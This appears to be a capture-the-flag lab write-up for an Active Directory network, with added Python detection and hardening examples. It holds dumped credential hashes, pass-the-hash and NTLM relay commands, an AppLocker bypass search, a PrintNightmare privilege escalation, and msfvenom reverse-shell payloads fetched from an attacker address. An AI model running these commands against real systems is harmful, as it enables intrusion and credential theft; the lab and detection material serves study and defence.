Domain : Window Manager
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : S-SRV01$
* Domain : holo.live
* Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : S-SRV01$
Domain : HOLOLIVE
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : s-srv01$
* Domain : HOLO.LIVE
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 27323 (00000000:00006abb)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : S-SRV01$
* Domain : holo.live
* Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef
ssp :
credman :
Authentication Id : 0 ; 27283 (00000000:00006a93)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : S-SRV01$
* Domain : holo.live
* Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef
ssp :
credman :
Authentication Id : 0 ; 26060 (00000000:000065cc)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 12/28/2022 5:34:04 AM
SID :
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 306298 (00000000:0004ac7a)
Session : Interactive from 1
User Name : watamet
Domain : HOLOLIVE
Logon Server : DC-SRV01
Logon Time : 12/28/2022 5:34:26 AM
SID : S-1-5-21-471847105-3603022926-1728018720-1132
msv :
[00000003] Primary
* Username : watamet
* Domain : HOLOLIVE
* NTLM : d8d41e6cf762a8c77776a1843d4141c9
* SHA1 : 7701207008976fdd6c6be9991574e2480853312d
* DPAPI : 300d9ad961f6f680c6904ac6d0f17fd0
tspkg :
wdigest :
* Username : watamet
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : watamet
* Domain : HOLO.LIVE
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/28/2022 5:34:10 AM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/28/2022 5:34:06 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : S-SRV01$
Domain : HOLOLIVE
Logon Server : (null)
Logon Time : 12/28/2022 5:34:04 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : s-srv01$
* Domain : HOLO.LIVE
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
Then we use
CrackMapExec: a post-exploitation tool for large Windows Active Directory (AD) environments.
Pass-the-Hash
CME supports Pass-the-Hash authentication over SMB with the -H flag:
crackmapexec smb <target(s)> -u username -H NTHASH
This lets us find the SMB servers present on the internal network:
crackmapexec smb 10.200.110.0/24 -u watamet -d HOLOLIVE -H d8d41e6cf762a8c77776a1843d4141c9
Output:
┌──(zacarx㉿zacarx)-[~]
└─$ crackmapexec smb 10.200.110.0/24 -u watamet -d HOLOLIVE -H d8d41e6cf762a8c77776a1843d4141c9
SMB 10.200.110.30 445 DC-SRV01 [*] Windows 10.0 Build 17763 x64 (name:DC-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.35 445 PC-FILESRV01 [*] Windows 10.0 Build 17763 x64 (name:PC-FILESRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.31 445 S-SRV01 [*] Windows 10.0 Build 17763 x64 (name:S-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.30 445 DC-SRV01 [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9
SMB 10.200.110.35 445 PC-FILESRV01 [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9
SMB 10.200.110.31 445 S-SRV01 [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9 (Pwn3d!)
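Two of the steps above leave distinctive traces: sekurlsa::logonpasswords opens a handle to lsass.exe with read access (Sysmon Event ID 10), and the CrackMapExec sweep logs the same account on to every host in the range within seconds (Security Event ID 4624, logon type 3, NTLM). Added example (my code, not the post's or CrackMapExec's): two detections in Python over a constructed list of events represented as dicts in the shape a SIEM would hand over. The host names and account come from the output above; the process path, timestamps and source address are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

PROCESS_VM_READ = 0x0010          # access right needed to read another process's memory
# Processes that legitimately open LSASS with read access on this estate; tune per environment.
LSASS_READERS_ALLOWED = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def detect_lsass_access(events: List[Dict]) -> List[Dict]:
    """Sysmon Event ID 10: a process outside the allowlist opened lsass.exe with VM_READ."""
    hits = []
    for e in events:
        if e.get("Source") != "Sysmon" or e.get("EventID") != 10:
            continue
        if not e["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        if e["SourceImage"].lower() in LSASS_READERS_ALLOWED:
            continue
        if int(e["GrantedAccess"], 16) & PROCESS_VM_READ:
            hits.append({"host": e["Computer"], "process": e["SourceImage"],
                         "access": e["GrantedAccess"]})
    return hits


def detect_ntlm_sweep(events: List[Dict], window_seconds: int = 60, min_hosts: int = 3) -> List[Dict]:
    """Security Event ID 4624, logon type 3 over NTLM: one account reaching min_hosts or more
    distinct hosts inside window_seconds, which is what a pass-the-hash sweep looks like."""
    window = timedelta(seconds=window_seconds)
    per_account = defaultdict(list)
    for e in events:
        if e.get("Source") != "Security" or e.get("EventID") != 4624:
            continue
        if e.get("LogonType") != 3 or e.get("AuthenticationPackageName") != "NTLM":
            continue
        account = f'{e["TargetDomainName"]}\\{e["TargetUserName"]}'.upper()
        per_account[account].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["Computer"], e["IpAddress"]))
    alerts = []
    for account, logons in per_account.items():
        logons.sort()
        for i, (start, _host, source_ip) in enumerate(logons):
            hosts = {host for t, host, _ip in logons[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"account": account, "source_ip": source_ip,
                               "hosts": sorted(hosts), "start": start.isoformat()})
                break                       # one alert per account is enough
    return alerts


def _logon(ts, computer, user, domain, src, logon_type=3, package="NTLM"):
    """Build a minimal 4624 record (constructed test data, not real telemetry)."""
    return {"Source": "Security", "EventID": 4624, "TimeCreated": ts, "Computer": computer,
            "TargetUserName": user, "TargetDomainName": domain, "IpAddress": src,
            "LogonType": logon_type, "AuthenticationPackageName": package}


# Constructed events modelled on the hosts and account in the write-up.
SAMPLE_EVENTS = [
    {"Source": "Sysmon", "EventID": 10, "Computer": "S-SRV01",
     "SourceImage": r"C:\inetpub\wwwroot\uploads\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Source": "Sysmon", "EventID": 10, "Computer": "S-SRV01",
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    _logon("2022-12-28T06:41:00", "PC-FILESRV01", "watamet", "HOLOLIVE", "10.200.110.33",
           logon_type=2, package="Kerberos"),          # interactive logon, ignored
    _logon("2022-12-28T06:42:01", "DC-SRV01", "watamet", "HOLOLIVE", "10.200.110.33"),
    _logon("2022-12-28T06:42:02", "PC-FILESRV01", "watamet", "HOLOLIVE", "10.200.110.33"),
    _logon("2022-12-28T06:42:03", "S-SRV01", "watamet", "HOLOLIVE", "10.200.110.33"),
    _logon("2022-12-28T06:50:00", "DC-SRV01", "svc-backup", "HOLOLIVE", "10.200.110.35"),
]

if __name__ == "__main__":
    for hit in detect_lsass_access(SAMPLE_EVENTS):
        print("LSASS read:", hit)
    for alert in detect_ntlm_sweep(SAMPLE_EVENTS):
        print("NTLM sweep:", alert)
```

The sweep rule keys on the account rather than the source address because a relay or a second pivot host would change the address but not the account; the LSASS rule keys on the access mask rather than the process name because the binary can be renamed.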
Let's connect:
smbclient //10.200.110.35/Users -U HOLOLIVE/watamet
and get user.txt.
Enter:
xfreerdp /u:watamet /p:'Nothingtoworry!' /v:10.200.110.35
Get onto the desktop and open PowerShell.
We use the helper tool https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt
r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0) (github.com)
Download it to Kali, then upload it:
powershell.exe Invoke-WebRequest http://10.50.107.175/SeatbeltNet3.5x64.exe -outfile sb.exe
./sb.exe -group=system
We find it is blocked and will not run, so let's try an AppLocker bypass.
Run secpol.msc
but it's no use.
We found a bypass project
and entered:
#A hacky script to convert YML to MD file the way I want
#Author: Oddvar Moe
#If you can use it, be my guest!
function Convert-YamlToMD
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
$YamlObject,
[Parameter(Mandatory=$true)]
[String]
$Outfile
)
Begin
{
}
Process
{
# Header
"`#`# $($YamlObject.Name)" | Add-Content $Outfile
"``````" | Add-Content $Outfile
foreach($cmd in $YamlObject.Commands)
{
"`n$($cmd.command)" | Add-Content $Outfile
"$($cmd.description)" | Add-Content $Outfile
}
"``````" | Add-Content $Outfile
"* Windows binary: $($YamlObject.'Windows Binary') " | Add-Content $Outfile
"* Bypasses Default AppLocker Rules: $($YamlObject.'Bypasses Default AppLocker Rules') " | Add-Content $Outfile
"* Mitre: `[$($YamlObject.MITRE.ID)`]`($($YamlObject.MITRE.Link)`) " | Add-Content $Outfile
" " | Add-Content $Outfile
"* Links: " | Add-Content $Outfile
foreach($link in $YamlObject.Resources)
{
" * $($link.link)" | Add-Content $Outfile
}
" " | Add-Content $Outfile
"* File path: " | Add-Content $Outfile
foreach($path in $YamlObject.'Full path')
{
" * $($path.path)" | Add-Content $outfile
}
" " | Add-Content $Outfile
"* Acknowledgement: " | Add-Content $Outfile
foreach($person in $YamlObject.Acknowledgement)
{
" * Name: $($person.Name)" | Add-Content $Outfile
" * Twitter: `[$($person.TwitterHandle)`]`(https://twitter.com/$($person.TwitterHandle)`)" | Add-Content $Outfile
" * Blog: $($person.Blog)" | Add-Content $Outfile
}
" " | Add-Content $Outfile
"OS: " | Add-Content $Outfile
foreach($OS in $YamlObject.'Verified on OS')
{
if($OS.Values -eq "true")
{
"`- `[x`] $($OS.Keys)" | Add-Content $Outfile
}
}
}
End
{
}
}
function Add-MainIndex
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
$YamlObject,
[Parameter(Mandatory=$true)]
[String]
$Outfile
)
Begin
{
}
Process
{
# Header
# OS BINARIES
#[Atbroker.exe](OSBinaries/Atbroker.md)
"`[$($YamlObject.Name)`]`(md/$($YamlObject.Name).md`)" | Add-Content $Outfile
"" | Add-Content $Outfile
}
End
{
}
}
function New-MainIndex
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
[String]
$Outfile,
[ValidateSet("Verified","NotVerified")]
[Parameter(Mandatory=$true)]
[String]
$Status
)
Begin
{
}
Process
{
# Verified Header
if($Status -eq "Verified")
{
"`# Verified AppLocker bypasses for Default rules" | Add-Content $Outfile
"This list contains all the bypasses that has been verified to bypass AppLocker default rules." | Add-Content $Outfile
"" | Add-Content $Outfile
}
#NotVerified Header
if($Status -eq "NotVerified")
{
"`# Potential bypasses" | Add-Content $Outfile
"This list contains all the bypasses that has NOT been verified, or does not bypass the default AppLocker rules (but can bypass AppLocker in other ways) or is a claimed bypass." | Add-Content $Outfile
"" | Add-Content $Outfile
}
}
End
{
}
}
$mainpath = "C:\data\gitprojects\UltimateAppLockerByPassList"
# Read yaml files
$bins = @()
cd "$mainpath\yml"
get-childitem | foreach{
[string[]]$fileContent = Get-Content $_
$content = ''
foreach ($line in $fileContent) { $content = $content + "`n" + $line }
$yaml = ConvertFrom-YAML $content
$bins += $yaml
}
#Initialize index files
New-MainIndex -Status Verified -Outfile $mainpath"\VerifiedAppLockerBypasses.md"
New-MainIndex -Status NotVerified -Outfile $mainpath"\UnverifiedAppLockerBypasses.md"
$bins | foreach{
WRITE-HOST "$($_.name)"
Convert-YamlToMD -YamlObject $_ -Outfile "$mainpath\md\$($_.name).md"
if($_.'Bypasses Default AppLocker Rules')
{
Add-MainIndex -YamlObject $_ -Outfile $mainpath"\VerifiedAppLockerBypasses.md"
}
else{
Add-MainIndex -YamlObject $_ -Outfile $mainpath"\UnverifiedAppLockerBypasses.md"
}
}
However, what I used at first was:
# Find directories under C:\Windows that the Users group can both write to and execute from.
# AppLocker's default rules allow execution from C:\Windows, so such a folder defeats them.
$group = "*Users*"
$root_folder = "C:\windows"
write-output "[*] Processing folders recursively in $root_folder"
foreach($_ in (Get-ChildItem $root_folder -recurse -ErrorAction SilentlyContinue)){
    if($_.PSIsContainer)   # directories only
    {
        try{
            $res = Get-Acl $_.FullName
        } catch{
            continue       # skip folders whose ACL cannot be read
        }
        foreach ($a in $res.Access){
            if ($a.IdentityReference -like $group){
                # writable (Write or CreateFiles) and executable (ReadAndExecute) for Users
                if ( ($a.FileSystemRights -like "*Write*" -or $a.FileSystemRights -like "*CreateFiles*" ) -and $a.FileSystemRights -like "*ReadAndExecute*" ){
                    write-host "[+] " $_.FullName -foregroundcolor "green"
                }
            }
        }
    }
}
This gives us a few unrestricted locations.
Switch to C:\windows\Tasks
and run again:
.\Seatbealt.exe -group=system
but a new error appeared, damn it.
Next, let's take a look with PowerView.
Enter Import-Module .\PowerView.ps1
Get-DomainUser
For more, see
PowerView-3.0 tips and tricks (github.com)
Dr.korbinian recommends:
# enumerate/list all groups present on a local machine/computer
Get-NetLocalGroup
# enumerate/list all members of a local group such as users, computers, or service accounts
Get-NetLocalGroupMember
# enumerate/list all users currently logged onto the local machine/computer
Get-NetLoggedon
# enumerate/list the active directory domain GPOs installed on the local machine
Get-DomainGPO
# check all hosts connected to the domain and check if the current user or listed user is a local administrator
Find-LocalAdminAccess
# list/enumerate all the scheduled tasks present on the system
Get-ScheduledTask
# list/enumerate all the scheduled tasks present on the system which are located in the Users directory
Get-ScheduledTask -TaskPath "\Users\*"
# list specific information on specified Tasks allowing the attacker to identify the task and how it could be exploited
Get-ScheduledTaskInfo -TaskName <Full Path>
# enumerate a user's groups or all groups within the domain. If it throws an error, you need to run the upcoming command
Import-Module ActiveDirectory; Get-ADGroup
# only possible in elevated powershell window - enables the ActiveDirectory module
Add-WindowsFeature RSAT-AD-PowerShell
# retrieve the groups a user, computer group, or service account is a member of (also only works with the ActiveDirectory module)
Get-ADPrincipalGroupMembership
Next we escalate privileges.
Honestly, working through the material above is hard going, so Dr.korbinian recommended:
After all, the target is from 2020, so using a 2021 vulnerability is simply overkill.
git clone https://github.com/calebstewart/CVE-2021-1675
powershell.exe Invoke-WebRequest http://10.50.107.175/CVE-2021-1675.ps1 -outfile CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "Zacarx" -NewPassword "zacax9981!"
net user Zacarx
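Invoke-Nightmare abuses the Print Spooler's driver installation path (CVE-2021-1675, PrintNightmare) to add a local administrator. Added example (mine, not the project's): a Python check of the settings that Microsoft's August 2021 Point and Print change (KB5005652) made authoritative, namely RestrictDriverInstallationToAdministrators, NoWarningNoElevationOnInstall and UpdatePromptSettings under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint, plus whether the Spooler service runs on hosts that do not need it. The registry and service export is assumed to have been collected already (that step is not shown); the hosts are constructed.

```python
from typing import Dict, List

POLICY_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"


def assess_print_spooler(host: Dict) -> List[str]:
    """Return findings for one host.

    host = {
      "name": str,
      "spooler_running": bool,     # state of the Spooler service
      "needs_printing": bool,      # does this host actually serve or use printers?
      "point_and_print": dict,     # values exported from POLICY_KEY (missing = not configured)
    }
    Collecting these values (Get-Service / Get-ItemProperty) is assumed to have happened already.
    """
    findings = []
    pnp = host.get("point_and_print", {})
    if host.get("spooler_running") and not host.get("needs_printing", False):
        findings.append("Spooler service is running but the host has no printing role: stop and disable it")
    # Driver installation must be limited to administrators. A missing value relies on a default
    # that only exists on hosts carrying the August 2021 update, so require it explicitly.
    if pnp.get("RestrictDriverInstallationToAdministrators") != 1:
        findings.append("RestrictDriverInstallationToAdministrators is not 1: non-admins may install printer drivers")
    # Either of these two values set to 1 re-opens the exposure even on patched hosts.
    if pnp.get("NoWarningNoElevationOnInstall", 0) == 1:
        findings.append("NoWarningNoElevationOnInstall=1 removes the install prompt; set it to 0")
    if pnp.get("UpdatePromptSettings", 0) == 1:
        findings.append("UpdatePromptSettings=1 removes the update prompt; set it to 0")
    return findings


def assess_fleet(hosts: List[Dict]) -> Dict[str, List[str]]:
    """Findings per host, listing only hosts that have any."""
    result: Dict[str, List[str]] = {}
    for host in hosts:
        findings = assess_print_spooler(host)
        if findings:
            result[host["name"]] = findings
    return result


# Constructed hosts: the first two are named after machines in the write-up, the third is invented.
SAMPLE_HOSTS = [
    {"name": "S-SRV01", "spooler_running": True, "needs_printing": False,
     "point_and_print": {"NoWarningNoElevationOnInstall": 1, "UpdatePromptSettings": 1}},
    {"name": "DC-SRV01", "spooler_running": True, "needs_printing": False,
     "point_and_print": {"RestrictDriverInstallationToAdministrators": 1}},
    {"name": "PRINT-01", "spooler_running": True, "needs_printing": True,
     "point_and_print": {"RestrictDriverInstallationToAdministrators": 1,
                         "NoWarningNoElevationOnInstall": 0, "UpdatePromptSettings": 0}},
]

if __name__ == "__main__":
    for name, findings in assess_fleet(SAMPLE_HOSTS).items():
        print(name)
        for f in findings:
            print("  -", f)
```

On a domain controller the first finding is the one that matters most: a DC rarely needs to print, and a stopped Spooler removes the whole attack surface regardless of the Point and Print values.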
Next, we follow the TryHackMe route:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.107.175 LPORT=53 -f dll -o kavremoverENU.dll
set payload windows/meterpreter/reverse_tcp
set LHOST 10.50.107.175
set LPORT 53
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 53
msf6 exploit(multi/handler) > run
powershell.exe Invoke-WebRequest http://10.50.107.175/kavremoverENU.dll -outfile kavremoverENU.dll
nmap -p 445 --script smb2-security-mode 10.200.110.32 -Pn
Reference article:
NTLM relay attack: principles and implementation - Shanfenglan7's blog - CSDN
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=53 -f exe > meterpreter_shell.exe
└─$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 53
msf6 exploit(multi/handler) > run
sudo ntlmrelayx.py -t smb://10.200.110.30 -smb2support -socks
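ntlmrelayx only succeeds against hosts that accept unsigned SMB sessions, which is what signing:False in the CrackMapExec banners above means, and the nmap smb2-security-mode script reports the same property. Added example (my code, not from the post or either tool): a Python parser for those banner lines that lists relay-exposed and SMBv1-enabled hosts and builds a per-host hardening worklist. The input reuses the three banner lines from this post plus one constructed host for contrast.

```python
import re
from typing import Dict, List

# One CrackMapExec banner line per host, printed before the authentication result lines.
BANNER = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+\[\*\]\s+"
    r"(?P<os>.+?)\s+\(name:(?P<hostname>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


def parse_cme_banners(text: str) -> List[Dict]:
    hosts = []
    for line in text.splitlines():
        m = BANNER.match(line.strip())
        if not m:
            continue                  # [+]/[-] result lines and other noise are skipped
        hosts.append({
            "ip": m.group("ip"), "name": m.group("name"), "domain": m.group("domain"),
            "os": m.group("os"),
            "signing_required": m.group("signing") == "True",
            "smbv1": m.group("smbv1") == "True",
        })
    return hosts


def relay_exposed(hosts: List[Dict]) -> List[str]:
    """Hosts that accept unsigned SMB sessions and are therefore NTLM-relay targets."""
    return sorted(h["ip"] for h in hosts if not h["signing_required"])


def smbv1_enabled(hosts: List[Dict]) -> List[str]:
    return sorted(h["ip"] for h in hosts if h["smbv1"])


def hardening_worklist(hosts: List[Dict]) -> Dict[str, List[str]]:
    """Per host, the settings to change. The policy name is its Group Policy display name."""
    work: Dict[str, List[str]] = {}
    for h in hosts:
        items = []
        if not h["signing_required"]:
            items.append("Microsoft network server: Digitally sign communications (always) = Enabled")
        if h["smbv1"]:
            items.append("Remove the SMB1Protocol feature")
        if items:
            work[f'{h["name"]} ({h["ip"]})'] = items
    return work


# The banner lines from the write-up, plus one constructed host (FS-HARDENED) and a constructed
# failed-authentication line to show that non-banner lines are ignored.
CME_OUTPUT = """\
SMB 10.200.110.30 445 DC-SRV01 [*] Windows 10.0 Build 17763 x64 (name:DC-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.35 445 PC-FILESRV01 [*] Windows 10.0 Build 17763 x64 (name:PC-FILESRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.31 445 S-SRV01 [*] Windows 10.0 Build 17763 x64 (name:S-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.40 445 FS-HARDENED [*] Windows 10.0 Build 17763 x64 (name:FS-HARDENED) (domain:HOLOLIVE) (signing:True) (SMBv1:True)
SMB 10.200.110.40 445 FS-HARDENED [-] HOLOLIVE\\watamet STATUS_LOGON_FAILURE
"""

if __name__ == "__main__":
    hosts = parse_cme_banners(CME_OUTPUT)
    print("relay-exposed:", relay_exposed(hosts))
    print("SMBv1 enabled:", smbv1_enabled(hosts))
    for host, items in hardening_worklist(hosts).items():
        print(host)
        for item in items:
            print("  -", item)
```

In this lab every host, the domain controller included, reports signing:False, which is why the relay to 10.200.110.30 is even an option; requiring signing on the server side closes it without touching clients.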